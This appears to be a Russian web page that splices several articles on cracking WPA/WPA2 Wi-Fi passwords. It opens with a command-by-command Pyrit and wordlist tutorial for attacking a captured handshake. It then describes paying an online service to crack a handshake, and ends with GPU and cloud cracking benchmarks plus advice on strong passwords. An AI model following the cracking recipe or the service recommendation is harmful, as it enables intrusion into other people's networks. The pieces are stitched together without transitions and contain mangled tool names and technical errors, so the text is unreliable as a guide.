Взлом WiFi пароля — расшифровка хендшейка. Сервис для брутфорса WPA2 Можно ли защититься

Преимущества использования Pyrit

Взлом захваченных рукопожатий — это единственный способ взлома WPA/WPA2 паролей. Производится он методом брутфорса (перебора паролей).

Кстати, если вы ещё не знакомы с техникой захвата рукопожатий, то обратитесь к статье « ».

Поскольку использование брутфорса не гарантирует положительного результата, придумано несколько техник, которые позволяют существенно повысить шансы на успех. К ним относятся:

• использование видеокарт для подбора паролей (значительно увеличивает скорость перебора)
• использование таблиц с предварительно рассчитанными хешами (увеличение скорости + возможность повторного использования для одной и той же точки доступа, возможность перепробовать десятки рукопожатий от одной точки доступа за считанные секунды)
• использование хороших словарей (повышает шансы на успех)

В Pyrit можно использовать все эти техники — поэтому он является самым быстрым взломщиком WPA/WPA2 паролей, либо входит в двойку сильнейших наравне с oclHashcat.

Другие программы также реализуют эти техники. Например и в oclHashcat и в coWPAtty реализован перебор по словарю. В coWPAtty реализован предварительный расчёт хешей (но отсутствует поддержка использования графических карт). oclHashcat позволяет использовать мощь видеокарт, но не делает предварительный расчёт хешей. Забегаю вперёд, отмечу, что в oclHashcat можно реализовать предварительный расчёт хешей и полученные данные неоднократно использовать для одной точки доступа, для проверки нескольких рукопожатий без увеличения времени на расчёт хешей, как это сделать будет описано позже. Aircrack-ng перебирает по словарю и эффективно использует многоядерные процессоры, но не использует другие "ускорения".

На моей системе oclHashcat делает перебор для взлома WPA/WPA2 паролей со скоростью 31550 H/s, а Pyrit рассчитывает хеши со скоростью 38000-40000 PMKs. Дальнейшая проверка рукопожатий занимает меньше секунды. Из этого видно, что даже при проверке одного хендшейка мы увеличиваем скорость примерно на треть, а если мы хотим проверить несколько рукопожатий для одной ТД, то с oclHashcat всё нужно начинать заново. В Pyrit же каждое новое рукопожатие занимает доли секунды.

Для того, чтобы Pyrit раскрыл всю свою мощь, у вас должны быть установлены проприетарные драйвера для видео карты. Посмотрите на статью « » и на материал, ссылки на который в ней даны — там поэтапно рассказывается об установки драйверов и Pyrit в Kali Linux 2 на компьютере с графической картой от AMD . Нужно проделать все шаги, а не только последнюю инструкцию . У меня нет компьютера с NVidia, поэтому у меня нет актуальных инструкций об установке драйвера и Pyrit для систем под NVidia .

Самый быстрый взлом WPA/WPA2 паролей

Мои исходные данные:

• атакуемая ТД - DANIELLE2015
• файл, с предварительно захваченным рукопожатием, называется DANIELLE2015-01.cap

Словарь для взлома WPA/WPA2

Я буду использовать словарь rockyou, который поставляется с Kali Linux. Для обучения этого вполне достаточно, а для практических атак могу порекомендовать сгенерированные словари номеров телефонов, сгенерированные словари для конкретных ТД вида имя_ТД+цифры, которые заполняют парольную фразу до восьми символов.

Давайте скопируем лучший файл словаря в каталог root.

Cp /usr/share/wordlists/rockyou.txt.gz .

Распакуем его.

Gunzip rockyou.txt.gz

Поскольку, согласно требованиям, минимальный пароль WPA2 может быть в 8 символов, давайте пропарсим файл, чтобы отфильтровать любые пароли, которые менее 8 символов и более 63 (на самом деле, вы можете просто пропустить эту строчку, это полностью на ваше усмотрение). Таким образом, мы сохраним этот файл под именем newrockyou.txt.

Cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Давайте посмотрим, как много паролей содержит этот файл:

Wc -l newrockyou.txt

В нём целых 9606665 паролей.

Оригинальный файл содержит ещё больше.

Wc -l rockyou.txt

Там 14344392 паролей. Итак, мы сделали этот файл короче, что означает, мы можем протестировать ТД в более сжатый срок.

Наконец, давайте переименуем этот файл в wpa.lst.

Mv newrockyou.txt wpa.lst

Создаём ESSID в базе данных Pyrit

Сейчас нам нужно создать ESSID в базе данных Pyrit

Pyrit -e DANIELLE2015 create_essid

ВНИМАНИЕ: Если в названии ТД есть пробел, например, “NetComm Wireless”, тогда ваша команда будет вроде этой:

Pyrit -e "NetComm Wireless" create_essid

Шикарно, теперь у нас есть ESSID, добавленный в базу данных Pyrit.

Импортируем словарь в Pyrit

Сейчас, когда ESSID добавлен в базу данных Pyrit, давайте импортируем наш словарь паролей.

Используйте следующую команду для импорта предварительно созданного словаря паролей wpa.lst в базу данных Pyrit.

Pyrit -i /root/wpa.lst import_passwords

Создайте таблицы в Pyrit, используя пакетный (batch) процесс

Это просто, просто наберите следующую команду

Pyrit batch

Так как данная операция выполняется на ноуте, я имею 38000-40000 PMKs. Это далеко не предел — настольные компьютеры с хорошей графической картой помогут вам значительно увеличить скорость этих вычислений.

Вы должны быть осторожны, насколько большой ваш файл словаря и насколько ГОРЯЧИЕ ваш процессор и графическая карта. Используйте дополнительное охлаждение, чтобы избежать повреждения.

Процесс взлома с Pyrit

Мы будем применять атаку на рукопожатие (handshake), используя базу данных предварительно посчитанных хешей. После того, как мы выполнили все необходимые шаги по подготовке, запустить атаку стало совсем легко. Просто используйте следующую команду для начала процесса взлома.

Pyrit -r DANIELLE2015-01.cap attack_db

Вот и всё. Весь процесс, включающий предварительный расчёт хешей, занял несколько минут. Чтобы пройти по всей таблице базы данных для получения пароля, если он присутствует в словаре, понадобилось меньше секунды. У меня скорость достигла 6322696 PMKs. Это, безусловно, быстрее всего.

Это занимает секунды — поэтому всегда стоит использовать, если пароль не найден.

Атака на рукопожатие (handshake) со словарём в Pyrit без использования предварительно посчитанных таблиц

Если вам не хочется создавать базу данных, а хочется напрямую копошиться в файле словаря (что много медленнее), вы можете сделать следующее

Pyrit -r DANIELLE2015-01.cap -i /root/wpa.lst attack_passthrough

Скорость этого способа? 17807 PMKs в секунду. На мой вкус намного медленнее.

Очищаем Pyrit и базу данных

Наконец, если нужно, вы можете удалить ваш essid и сделать очистку.

Pyrit -e DANIELLE2015 delete_essid

Это высвободит довольно много места на диске.

Не так давно говоря с одним человеком на предмет взлома беспроводных сетей WiFi c WPA и WPA2 шифрованием, тот авторитетно заявил что мол они ломаются с пол пинка. На мой же вопрос, пробовал ли он реализовать это на практике, было сказано что он был близок к этому. Самонадеянно неправда ли? Надо сказать что в 2006 году я защитил диссертацию, как раз таки, по взлому WiFi.

Что изменилось за 6-ть лет, и действительно ли так просто взломать WPA/WPA2 шифрование?

В 2006 году единственным способом взлома WPA шифрования был банальный перебор пароля к WiFi сети. Порыскав по просторам Интернета, на соответствующую тему я понял что ситуация практически не изменилась, но изменились аппаратные ресурсы которые могут быть в руках у взломщика.
По сути единственным останавливающий фактор на пути взлома был и остаётся вопрос вычислительных ресурсов для перебора пароля. И если тогда всё упиралось в ресурсы CPU, аля центральный процессор, то теперь, есть несколько другой подход, о чём чуть позже.
Варианты использования суперкомпьютеров рассматривать не будем в силу несостоятельности данного подхода в реальной жизни, по скольку я сильно сомневаюсь что у взломщика под рукой будет достаточной мощности кластер, а если он будет, то думаю меньше всего его будет волновать взлом беспроводных сетей:)
В не зависимости от утилиты, для взлома, потребуется 2 составляющие, а именно файл с дампом (перехваченными пакетами) от искомой сети, и словарь в виде текстового файла по которому будет подбираться пароль.
К первому условию надо добавить ещё и то, что в файле с дампом должен присутствовать так называемый handshake пакет, т. е. пакет с моментом начального подключения беспроводного клиента к точки доступа. В принципе атакующий может послать в эфир специально сформированный пакет, что вызовет повторное подключение клиента к точке доступа с посылом handshake.
Касательно второго условия, стоит сказать что минимальная длина паролей в словаре должна быть 8-мь символов, по скольку именно это условие WPA шифрования.
Особенно углубляться в это дальше не будем, допустим у нас есть искомый дамп, и словарь.
Для начала попробуем довольно известную утилиту Aircrack-ng, ну а точнее набор утилит, в который входит и сам aircrack.

Есть версии как под Linux, так и под Windows.

Формально можно радоваться, но об этом чуть позже.
Помните в самом начале я говорил про другой подход, это - CUDA.
Суть подхода проста - использовать мощности графического процессора, аля видеокарта от Nvidia или ATI, с её множеством процессоров для распараллеленых вычислений, в нашем случае перебора пароля.
Первая программа которая мне попалась и умеет использовать CUDA это - Elcomsoft Wireless Security Auditor.

Для начала я попробовал запустить её полагаясь лишь на мощности CPU, в моём случае это Intel Core i5-2500. Чтож утилита сделала своё дело, причём чуть быстрее чем aircrack.
Теперь настало время включить всю мощь GPU, что в моём случае это Nvidia GTX 560 Ti.

И повторить перебор паролей.

Скорость выросла в 5-ть раз, довольно неплохо.

Формально во всех случаях мы нашли пароль и можно радоваться, но не совсем...
Минимальная длина пароля WPA – 8мь символов. А это означает примерно следующее, что если человек не привязал пароль к какому-то смыслу, аля qwer1234, то найти его будет весьма проблематично.

Для того чтоб перебрать пароль в 8-мь символов от a-z, средствами GPU, у вас уйдёт больше 3-х месяцев, долговато неправда ли? Но всё ещё приемлемо, можно например взять несколько GPU ускорителей. А вот если добавить сюда символы или просто увеличить длину пароля до 9 или 10 символов то решение задачи взлома методом перебора теряет смысл...

От сюда следует весьма простой вывод, если вы хотите спать спокойно на волнах WiFi, достаточно использовать буквенно-циферный пароль длиной 10 символов, НЕ!!! привязанный к логическому смыслу.

Эксперимент проводил на своей сети. Установив пароль в «qwerty12345 «, поймал хендшейк с помощью besside-ng входящего в состав aircrack-ng. В дистрибутиве Kali linux он уже установлен, в других случаях нужно было бы собирать самому. Затем сконвертировал cap файл в требуемый формат через онлайн сервис cap2hccap. После — отправил на сервис.

Спустя 2 часа на e-mail пришло уведомление о том, что пароль был найден. Для просмотра пароля необходимо было оплатить 50 рублей, цена смешная, если пароль действительно нашелся (это не первый сервис подобного рода который я проверял, 2 из 3 которые я тестировал до этого просто брали деньги, ничего не высылали и на обратную связь не реагировали). Оплатив через WebMoney указанную сумму на почту пришел код доступа для просмотра пароля. Введя его в форму, увидел настоящий пароль.

После проверки трижды пользовался услугами xsrc.ru. Две из трех попыток оказались успешными.

Введение

Всё чаще стала появляться информация о случаях взлома в беспроводных сетях, из этого можно сделать вывод: мы проигрываем битву за безопасность. С одной стороны, жизнь рядового пользователя стала куда комфортнее при доступе к всевозможным онлайн-сервисам и услугам, с другой - повсюду мы сталкивается с пренебрежением принципами безопасности и действиями, приводящими к потере данных.

Очевидно, что каждый из нас заинтересован в безопасности. Причина этого не в стремлении избежать возможных проблем со сменой паролей или заменой кредитной карты. Причина в том, что при отсутствии должного уровня безопасности есть риск однажды зайти на свой банковский счёт и обнаружить, что кто-то другой снимает с него деньги.

В другой нашей статье, , мы уже рассмотрели вопросы безопасности зашифрорванных и архивных данных на жёстком диске. Однако то исследование носило ограниченный характер: большинство из нас не шифруют свои данные, несмотря на то, что это обеспечивает дополнительную безопасность.

На этот раз мы рассмотрим другие аспекты защиты данных. Для тех, кому важно наличие постоянного доступа в сеть, хорошим вариантом коммуникации является беспроводное соединение. И если правда, что прочность цепи определяется прочностью самого слабого звена, то в первую очередь нужно рассматривать защиту паролей в беспроводном соединении.

Настройки тестирования

Тестовое оборудование
	Настольный ПК	Ноутбук (Lenovo ThinkPad T410)
Процессор	Intel Core i5-2500K (Sandy Bridge), 3.3 ГГц, LGA 1155, 6 Mбайт Shared L3	Intel Core i5-540M (Arrandale), 2.53 ГГц, PGA 988, 3 Mбайт Shared L3
Материнская плата	Asrock Z68 Extreme4	-
Память	Kingston Hyper-X 8 Гбайт (2 x 4 Гбайт) DDR3-1333 @ DDR3-1333, 1.5 Вт	Crucial DDR3-1333 8 Гбайт (2 x 4 Гбайт)
Жёсткий диск	Samsung 470 256 Гбайт	Seagate Momentus 5400.6 500 Гбайт
Видеокарты	GeForce GTX 460 1 Гбайт GeForce GTX 590 AMD Radeon HD 6850 AMD Radeon HD 6990	nVidia Quadro NVS 3100M
Блок питания	Seasonic 760 W, 80 PLUS	-
Сетевая карта	AirPcap Nx USB адаптер	AirPcap Nx USB адаптер
Системное ПО и драйверы
Операционная система	Windows 7 Ultimate 64-bit Backtrack 5 64-bit	Windows 7 Ultimate 64-bit Backtrack 5 64-bit
DirectX	DirectX 11	DirectX 11
Драйверы Windows	AirPcap 4.1.2 Catalyst 11.6 nVidia 275.33	AirPcap 4.1.2
Драйверы Linux	Catalyst 11.6 nVidia 275.09.07	-

Программное обеспечение
Cain & Abel	Version: 4.9.40
Aircrack-ng	Version: 0.70
Elcomsoft Wireless Security Auditor	Version: 4.0.211 Professional Edition
Pyrit	Version: 0.4.1-dev

Большинство тестов, о которых говорится в этой статье, проводилось в соответствии с принципом тестирования на условиях, близких к реальным. В тех редких случаях, когда мощности сигнала не хватало для тех или иных измерений, мы прибегали к использованию Cisco Linksys E4200, настроенного на частоту 2,4 Ггц.

Безопасность сети: первая линия защиты

Ничто не может гарантировать полную безопасность при подключении к сети. Однако можно принять определённые меры, которые сделают для злоумышленников задачу доступа к вашим данным сложнее. И так же, как возможны банковские гарантии, основанные на мерах по защите от потенциального физического ограбления, так и в хорошо настроенной сети можно обеспечить определённую степень безопасности цифровых "активов". Но, поскольку такие мероприятия недёшево стоят, требуют особых навыков или, как минимум, шага вперёд от позиции "я доверяю защиту данных своему файерволу, но при этом имею доступ ко всей сети", даже базовые уровни защиты часто игнорируются.

Забудем пока о многоплановом подходе к безопасности: ведь большинство беспроводных сетей защищено только ресурсами роутера. Именно он отделяет локальную сеть от глобальной и представляет собой первую ступень мероприятий безопасности.

Но это не только первая, но и основная линия обороны. Почему? Казалось бы, безопасность данных обеспечивается использованием файервола и применением шифрования данных, например, посредством программы TruCrypt . При этом, из соображений удобства можно открыть общий доступ к вашему соединению. Многие делают это, даже не задумываясь о том, что кто-то ещё может что-нибудь сделать с данными, используя открытый доступ к сети. Таким образом, процедура аутентификации - зачастую единственное, что защищает данные от тех, кто находится в пределах досягаемости сети и обладает возможностями, чтобы обмануть систему защиты.

Ясно, что видео высокого разрешения, просматриваемое на экране в гостиной, куда удобнее передавать через беспроводное соединение. Но оно же и значительно облегчает доступ к вашим данным, не говоря уже о том, что их использование без обеспечения безопасности открывает простор для выхода в сеть за ваш счёт.

На заре эпохи домашних сетей залогом безопасности служил сам факт того, что они были ограничены вполне материальными проводами. Однако сейчас, в эпоху беспроводных сетей, приходится думать о возможных атаках как из интернет-пространства (эту задачу можно доверить файерволу), так и из "физического" окружения: злоумышленник может находиться в зоне действия вашей сети, а его устройство работать в ней наряду с другими доверенными устройствами. Именно поэтому не следует открывать общий доступ к своему соединению.

Надеемся, что нам удалось вас убедить. Использование протоколов безопасности не даст полных гарантий защиты, но, по крайней мере, предохранит от излишних нагрузок на канал.

Вы ещё не знаете, что WEP мёртв?

Wired Equivament Privacy (WEP) был первым протоколом, который применялся для ограничения доступа к беспроводным сетям. Он был создан в 1999 году в рамках стандарта 802.11. Однако, уже долгое время WEP известен как "сломанный алгоритм" и по большей части вытеснен более эффективным Wi-Fi Protected Access (WPA).

Если вы до сих пор используете устаревший роутер и WEP, то ваша безопасность под угрозой. Wi-fi Alliance не поддерживает WEP с 2003 года, так как он слишком прост для взлома. Имея $20 и базовые технические навыки, любой сосед может взломать ваш пароль WEP за 10 минут, используя утилиты, которые находятся в открытом доступе. Мы можем вас уверить, что от WEP необходимо отказаться в пользу WPA.

Взламывать WEP можно по-разному и у нас есть достаточно примеров. Так как мы не ставим задачей научить вас методам взлома, то не станем распространяться об этом. Поверьте, что WEP-защиту можно легко обойти, и не проверяйте этого на своём опыте. Если вас всё же интересует эта тема, то попробуйте использовать Cain & Abel, Aorcraching-ng и AirPcapNx для взлома: это делается за пять минут, причём количество символов в ключе безопасности не играет никакой роли.

Основная проблема здесь заключается в том, что получить данные для взлома WEP-сети слишком легко. Даже в том случае, если для этого недостаточно тех пакетов, которые пересылаются между роутером и клиентом внутри сети, есть возможность посылать свои запросы таким образом, чтобы в ответных пакетах содержались данные, достаточные для подбора ключа сети. Можно даже принудительно отключать других пользователей от роутера для проверки подлинности соединения. Итак, если для вас важна безопасность, то не используйте протокол WEP.

WPA/WPA 2: хэширование, salting и transformation

WPA/WPA2, WinZip, WinRAR, Data Encryption API от Microsoft, FileVault от Apple, TruCrypt и OpenOffice - все они используют алгоритм защиты пароля PBKDF2 (Password-Based Key Derivation Function 2.0). Его ключевая особенность в том, что получение пароля не будет давать непосредственного доступа к защищаемым данным: для этого нужно сгенерировать ключ (расшифровку кода), основанную на значениях пароля.

В этом важнейшее отличие WEP от WPA: первый неэффективен в защите своего пароля, поскольку его можно извлечь непосредственно из данных, которые передаются во время проверки подлинности. И, таким образом, пользователи, которые находятся рядом на стоянке или в торговом центре, легко могут войти в вашу сеть. После получения пакетов, извлечь из них ключ и подключиться к сети не составит никакого труда. WPA отличается тем, что пароль здесь закодирован (хеширован), так что потенциальным хакерам придётся прибегать к тактике взлома "методом подбора".

В одной из наших недавних публикаций, посвящённых вопросам безопасности, в разделе комментариев читатели просили внести больше ясности в отношении понятий "таблицы-радуги" ("rainbow tables"), "хэширование" ("hashes"), salting и "transformations".

Есть два основных метода преобразования пароля в зашифрованный ключ. Первый называется salting, - возможно, вы уже слышали этот термин. Основа его заимствована из криптографии. С его помощью можно, например, предотвратить взлом второй платформы, если одна уже взломана, с учётом того, что обе используют один и тот же пароль. Без применения salting в случае, если на двух аппаратах используется один и тот же пароль, ключи безопасности также будут идентичными. И для взлома таких сетей достаточно прибегнуть к помощи таблицы-радуги: посредством перебора гигантского количества вариантов зависимостей ключей и паролей нужный отыскивается довольно легко. Применение salting сводит эту возможность на нет, так как в этом случае пароль каждый раз использует случайное значение для получения ключа безопасности. Такая технология используется, например, в SSID. Проще говоря: даже если у вашего соседа тот же пароль, что и у вас, если он использует salting, то ключ безопасности у вас будет разным.

1. Получение Data 1 и Data 2 из пароля и salt;
2. Образование ключа безопасности посредством следующего цикла:

То есть, из введённых значений пароля и salt (случайных битов) генерируется первый параметр данных - ключ в его промежуточном варианте. Далее он попадает в цикл хеширования, где каждый следующий его расчёт опирается на показатели предыдущего. В каждом цикле меняются ключевые значения. Реальный ключ безопасности - это результат нескольких тысяч повторения этой операции. И так как это процесс, который идёт только в одну сторону, для взлома методом подбора нужно восстанавливать значения ключа на каждый из шагов этой операции.

Этот процесс занимает 99% ресурсов при использовании метода подбора и применение серьёзных вычислительных мощностей - единственный залог успеха такой операции. Метод хеширования позволяет проводить вычисления одновременно для нескольких паролей и проводится быстрее, так как не использует KDF и salt. Огромная скорость, на которой работает алгоритм хеширования, не должна вас пугать. Этот вариант взлома ограничен платформами, которые не используют KDF и salt, которых минимальное количество.

Если вы хотите получить представление о том, как работают те или иные алгоритмы защиты, то вот факты. В WinZIP используется 2002 SHA-1 - преобразование для генерации ключа. Эта величина будет постоянной для любого пароля длиной до 64 символов. Именно поэтому взломать 10-значный пароль на AES-256 так же легко, как и на AES-128. В WPA, в свою очередь, используется 16388 преобразований для конвертации master key. Это делает подбор пароля на WPA в восемь раз менее эффективным, чем на WinZIP/AES.

Протокол WPA использует схему Pre-Shared Key (PSK). Это значит, что у нас есть доступ к мастер-ключу (это значение, которое прописано в поле пароля на роутере), но мы можем "выудить" ключи безопасности Pairwise Transient Key (PTK) одновременно с "four-way handshake".

Аутентификация проходит несколько этапов получения PTK (для этого используется парный мастер-ключ, который образуется из обычного мастер-ключа). Вся процедура перехода от PMK к PTK включает пять или шесть изменений значения ключа. Когда говорят о производительности вычислений при взломе, как правило, используют значение PMK.

Взлом WPA. Начинаем с "подготовки"

Вот три шага, которые нужно сделать для того, чтобы проникнуть в защищённую WPA-сеть.

• Подготовка: перехват пакетов данных, необходимых для выполнения атаки;
• Анализ: проверка полученных пакетов на предмет того, есть ли в них необходимые данные. Нужно менее 1 Мбайт, однако условие таково, чтобы сюда входили пакеты, содержащие информацию для авторизации PTK. На деле это означает, что кто-то должен подключиться к сети в то время, когда вы проводите "подготовку".
• Атака: применение метода подбора для вычисления пароля.

Выполнение процесса может меняться в зависимости от используемой операционной системы. В настоящее время взломщики, что неудивительно, предпочитают Linux, ну а для Windows существуют специальные инструменты, оптимизирующие этот процесс.

Но, вне зависимости от используемых ОС и ПО, для взлома недостаточно просто ввести нужные команды. Получение данных для генерации пароля может осложниться ещё и проблемами с совместимостью оборудования. Так, необходимо, чтобы целевая сеть была запущена при доступе к низкоуровневому протоколу 802.11, который не поддерживает большинство карт.

Итак, каковы же условия взлома? Для получения идентификационной информации нужно отслеживать передаваемые пакеты до тех пор, пока кто-нибудь не соединится с точкой доступа. При таком подключении передаются пакеты, которые потенциально могут быть использованы хакерами для проникновения в вашу сеть.

Однако и в том случае, если клиент уже подключен, всё равно есть возможность получить необходимую для взлома информацию, провоцируя переподключение клиента. Делается это довольно просто: одна строка в командной строке, направленная на отключение от сети конкретного устройства.

После того, как нужные пакеты данных получены, при помощи программы-взломщика можно подбирать пароль. Существует не больше 10 программ под Linux и Windows, которые позволяют это сделать. Большинство из них, такие как Aircrack-ng и coWTAtty, проводят "словарную атаку", то есть используют базы данных с часто используемыми паролями. Настоящую атаку могут провести только две программы: это Pyrit (применяется под Linux совместно с John the Ripper) и WSA от Elcomsoft (под Windows).

Координация атаки в Linux сложнее, чем в Windows. Для перехвата и анализа пакетов в этом случае используется Aircraft-ng, а для атаки - Pyrit в режиме pass-through совместно с coWTAtty (которая нужна для PMK – PTK преобразований). WSA от Elcomsoft - совсем другое дело, это очень простая в использовании программа. При наличии адаптера AirPcap она получает нужные пакеты данных, анализирует их и проводит атаку примерно за десять щелчков мышью.

Хотя атака с Linux - платформы сложнее в исполнении, стоит она куда дешевле. Полная версия WSA обойдется в $ 1199. В таком варианте предусмотрена поддержка 32 ядер процессора и восьми ядер видеокарты. Стандартная версия ограничена двумя ядрами процессора и одним - видеокарты, но и стоит она $ 399. Правда, при работе с ней понадобится дополнительное ПО для перехвата пакетов данных.

ОС	Linux	Windows	Windows (fully automated)
Подготовка	Aircrack-ng	Aircrack-ng
Анализ	Aircrack-ng		Wireless Security Auditor Pro Edition
Взлом	Pyrit via CoWAPtty	Wireless Security Auditor Std. Edition	Wireless Security Auditor Pro Edition
Стоимость ПО	Free	$399	$1199

Взлом методом подбора

Многое на эту тему мы уже рассказали в четвёртой части статьи "Взлом пароля с помощью видеокарты" . В двух словах: проведение такой атаки требует применения тактики "guessing and checking" с большими объёмами данных и на высокой скорости с целью подбора пароля.

В отличие от защитных банковских сервисов, WPA не имеет ограниченной аутентификации. Процесс подбора пароля может продолжаться сколько угодно долго.

Доступные символы	Количество 2-значных паролей	Количество 4-значных паролей	Количество 6-значных паролей
В нижнем регистре	676	456 976	308 915 776
В нижнем и верхнем регистрах	2 704	7 311 616	19 770 609 664
В нижнем и верхнем регистре, с использованием цифр	3 844	14 776 336	56 800 235 584
Все (печатаемые) символы ASCII	8 836	78 074 896	689 869 781 056

Метод подбора эффективен только при очень высокой скорости перебора вариантов. Количество возможных паролей возрастает экспоненциально с увеличением длины пароля и количества возможных символов (возможные пароли = n(длина пароля), где n есть количество возможных символов).

Но как правило, взломщик не знает, сколько символов в пароле. Поэтому нужно осуществлять полный перебор вариантов, начиная с односимвольных.

Взлом с помощью процессора

Если кто-то пытается проникнуть в вашу сеть, используя обычный ПК, то можно не волноваться. Атака наверняка не прорвётся через 16388 SHA1 – преобразования. И если при взломе WinZIP можно было работать со скоростью перебора около 20 млн вариантов пароля в секунду, то при взломе WPA c Intel Core i5-2500K скорость куда меньше - 5000 вариантов в секунду.

	Intel Core i5-2500K
Ядра	4 (без HT)	336
Тактовая частота	3.3 ГГц (base)	1350 МГц
Wireless Security Auditor	4752 паролей/с	18 105 паролей/с
Тест Pyrit	3949.13 PMKs/с	17 771.6 PMKs/с
Pyrit w/CoWPAtty	3 306.85 паролей/с	19 077.15 паролей/с
Время на взлом 1...6 - значного пароля (буквы + цифры)	140 дней, 14 часов (WSA)	35 дней (Pyrit)
Время на взлом 1...8 - значного пароля (буквы + цифры)	1480 лет 311 дней (WSA)	368 лет, 319 дней (Pyrit)

Посмотрим на результаты. При использовании цифробуквенного пароля длиной более 6 символов методом подбора с машины на процессоре Core i5 будет бессильна. Ну а если вы используете кодировку ASCII, то надежным будет уже шестисимвольный пароль.

Далее мы рассмотрим два показателя, которые доступны при работе платформа под Linux: это результаты тестирования Pyrit и значения, которые показывает сoWPAtty, когда она используется совместно с Pyrit. Обычная функция тестирования Pyrit - измерение производительности видеокарты, и с его помощью нельзя измерить показатели "расходов" на PMK - PTK преобразования.

При помощи сoWPAtty и WSA мы протестируем скорость, с которой проверяются перехваченные пакеты данных. Таким образом, полученные результаты будут адекватно отображать то, что происходит при использовании метода подбора защищённой WPA - сети.

Взлом с помощью видеокарты: AMD против nVidia в производительности метода подбора

Итак, каким образом будут справляться с задачей взлома видеокарты?

Общее время поиска из расчёта 5000 паролей WPA/с	1...4 - значные пароли	1...6 - значные пароли	1...8 - значные пароли	1...12 - значные пароли
Цифры	Мгновенно	4 минуты	6,5 часов	7,5 лет
Нижний регистр	2 минуты	18 часов	1,5 года	662 263 года
Буквы и цифры	52 минуты	140 дней	1 481 год
Символы ANSCII	5 часов	5 лет	48 644.66 лет	До следующего Большого взрыва

По сравнению с производительностью процессора, результат просто невероятный. Одна только GeForce GTX 460 даёт результаты, в четыре раза перекрывающие показатели Core i5-2500K.

Итак, приведённые таблицы наглядно показывают, что вычисления, проводимые видеокартой, будут опережать по скорости таковые для обычных процессоров. Это объясняется тем, что ускоритель на основе FPGA состоит из огромного количества процессоров, которые при совместной работе могут атаковать несколько типов шифрования. Для этой задачи хорошо подходят процессоры с несколькими ядрами.

Но эти показатели основаны на работе с видеокартой базовой конфигурации. Что произойдёт, если применять более сложное устройство?

Удивительно, насколько быстрее работают карты от AMD, чем от nVidia. В то же время, Radeon HD 6990 демонстрирует намного лучшие показатели ALU, чем GeForce GTX 590.

Для того, чтобы подключить вторую видеокарту Radeon HD 6990, мы применили режим CrossFire. Эта технология, предназначенная для поддержания баланса рабочих нагрузок на карту, поэтому замедляет вычисления при "методе подбора". В нашем случае можно было наблюдать ощутимое снижение производительности. При работе на AMD без мульти-режима мы получили соответственные изменения производительности и на Linux.

Итак, время на выполнение "подбора" для взлома пароля полностью зависит от количества ядер на рабочем процессоре и скорости, с которой он производит вычисления.

Время на поиск пороля	1...6 - значные буквенно - цифровые пароли	1...8 - значные буквенно - цифровые пароли
nVidia GeForce GTX 460 1 Гбайт	35 дней (Pyrit/CoWPAtty)	368.9 лет (Pyrit/CoWPAtty)
nVidia GeForce GTX 590	11.6 дней (Pyrit/CoWPAtty)	122.5 года (Pyrit/CoWPAtty)
2 х nVidia GeForce GTX 590	6.5 дней (WSA)	68.66 лет (WSA)
AMD Radeon HD 6850	20.4 дней (WSA)	214.75 лет (WSA)
AMD Radeon HD 6990	5.88 дней (WSA)	62.24 года (WSA)
2 x AMD Radeon HD 6990	3.08 дня (Pyrit/CoWPAtty)	32.97 года (Pyrit/CoWPAtty)

Вряд ли это рядовой случай, но для ресурсоёмких игр иногда всё же используется пара карт линеек GeForce GTX 590 и Radeon HD 6990. И, хотя в большинстве ситуаций пароль, состоящий из семи и более символов, безопасен, всё же стоит подумать и о наихудших возможных сценариях. Результаты тестов в таблице выше демонстрируют, что при работе на двух картах одновременно шанс взлома немного увеличивается.

Tesla от nVidia и EC2 от Amazon: хакерство в облачных сервисах

Взлом паролей может применяться для более масштабных целей, чем проникновение в домашние сети. Мы проверили, как работает Pyrit с картами на базе Tesla в "облаке" EC2 от Amazon.

Серверы в Amazon называются "Cluster GPU Quadruple Extra Large Instance", в них входит:

• 22 Гбайт памяти;
• 33.5 EC2 Compute Units (2 x Intel Xeon X5570, quad-core, на основе архитектуры Nehalem);
• 2 x nVidia Tesla M2050 GPU (на основе архитектуры Fermi)
• 1690 Гбайт места для хранения данных;
• 64-битная платформа;
• I/O производительность: интерфейс Ethernet на 10 Гбит;
• API name: cg1.4xlarge.

Сервер работает на Linux, поэтому мы проверим только работу Pyrit. Хорошая новость в том, что эта станция полностью масштабируется, можно добавлять клиентские узлы к главному серверу в целях распределения нагрузки. Скорость работы одного "главного" сервера 45000 - 50000 PMKs/с.

Полученные результаты могут показаться низкими: если смотреть на скорость вычислений с использованием только одной GeForce GTX 590, то кажется, что применение двух видеокарт GF 110 должно сильно увеличить её.

Tesla от nVidia была разработана для проведения сложных научных расчётов, таких как CFD. Платы на Tesla содержат по 3 и 6 Гбайт оперативной памяти с поддержкой ECC. Однако, на процесс производимых нами вычислений все эти вещи не влияют. И ещё одна плохая новость: nVidia снижает рабочую частоту Tesla в целях обеспечения стабильной работы 24/7 в среде HPC.

Но ключевой детерминантой при взломе WPA в "облаке" является масштабируемость. Процесс ускоряется на каждом задействованном узле с 18000 до 20000 PMKs/с - наглядная демонстрация эффективности распределения нагрузок между машинами, которой каждый может добиться самостоятельно.

Каждый кластер видеокарты снабжён линком Ethernet на 10 Гбит с ограничением трафика в обе стороны 1,25 Гбайт/с. Именно здесь пролегает черта ограничения скорости вычислений. Напоминаем, что один символ кодировки ANSCII занимает 1 байт. При взломе многозначных паролей основной сервер будет отправлять большее количество данных клиентам, а клиенты, в свою очередь, будут отправлять пакеты PMK/PTK обратно к главному серверу. При увеличении узлов в сети увеличиваются и "расходы" на пересылку данных.

Использование для взлома нескольких компьютеров, связанных по сети, - старая идея. Однако результативность такой схемы невелика, как мы могли видеть по результатам тестирования на единственной рабочей станции. Наглядный пример: около месяца назад Passware, Inc провёл взлом MS Office с использованием 8 кластеров на Amazon, и скорость достигала 30000 вариантов пароля в секунду. Того же результата можно добиться при использовании карты Radeon HD 5970 с Accent"s Office Password Recovery.

Защита вашей WPA – сети

Можно расслабиться: с практической точки зрения протокол WPA можно считать безопасным. При применении salting для хеширования понадобится слишком много ресурсов. Безопасность этого протокола подтверждается и Wi-Fi Alliance. Реальность такова, что даже при использовании двух карт Radeon HD 6990 скорость перебора вариантов пароля не будет больше 20000/с, а это значит, что на взлом 7-значного пароля уйдет больше года времени. Ясно, что это слишком долго для того, чтобы получить бесплатный интернет от соседа. Ну а если добавить дополнительные символы, то "метод подбора" будет бессилен уже против 6-значного пароля. Также можно вспомнить о том, что протокол WPA/WPA2 требует ввода паролей длиной 8 и более знаков.

